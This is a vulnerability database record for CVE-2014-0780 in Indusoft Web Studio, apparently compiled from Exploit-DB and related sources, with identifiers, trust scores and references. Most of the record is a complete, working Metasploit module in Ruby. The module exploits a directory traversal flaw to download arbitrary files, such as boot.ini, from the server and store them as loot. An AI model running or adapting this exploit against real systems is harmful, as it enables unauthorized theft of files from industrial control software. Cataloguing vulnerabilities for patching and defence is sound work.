ID
VAR-E-201709-0120
CVE
| cve_id: | CVE-2014-0780 | Trust: 1.5 |
EDB ID
42699
TITLE
Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit) - Windows webapps Exploit
Trust: 0.6
DESCRIPTION
Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit). CVE-2014-0780 . webapps exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | indusoft | model: | web studio | scope: | - | version: | - | Trust: 2.7 |
EXPLOIT
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Indusoft Web Studio Directory Traversal',
'Description' => %q{
This module exploits a flaw found in Indusoft Web Studio
<= 7.1 before SP2 Patch 4. This specific flaw allows users
to browse outside of the webroot to download files found
on the underlying system
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2014-0780' ],
[ 'ZDI', '14-118/' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02']
],
'DisclosureDate' => 'Jan 18 2013'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "/" + levels + datastore['FILE'],
})
if res and res.code == 200 and res.message =~ /Sending file/
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Directory Traversal Information Disclosure (Metasploit)
Trust: 1.6
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | web | Trust: 0.5 |
| tag: | file inclusion | Trust: 0.5 |
CREDITS
James Fitts
Trust: 0.6
EXTERNAL IDS
| db: | ICS CERT | id: | ICSA-14-107-02 | Trust: 2.7 |
| db: | EXPLOIT-DB | id: | 42699 | Trust: 1.6 |
| db: | NVD | id: | CVE-2014-0780 | Trust: 1.5 |
| db: | EDBNET | id: | 94189 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 28533 | Trust: 0.6 |
| db: | EDBNET | id: | 94466 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 144175 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-0780 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/42699/ | Trust: 0.6 |
| url: | https://0day.today/exploits/28533 | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 144175 |
| db: | EXPLOIT-DB | id: | 42699 |
| db: | EDBNET | id: | 94189 |
| db: | EDBNET | id: | 94466 |
LAST UPDATE DATE
2022-07-27T09:24:18.078000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 144175 | date: | 2017-09-15T01:15:20 |
| db: | EXPLOIT-DB | id: | 42699 | date: | 2017-09-13T00:00:00 |
| db: | EDBNET | id: | 94189 | date: | 2017-09-13T00:00:00 |
| db: | EDBNET | id: | 94466 | date: | 2017-10-13T00:00:00 |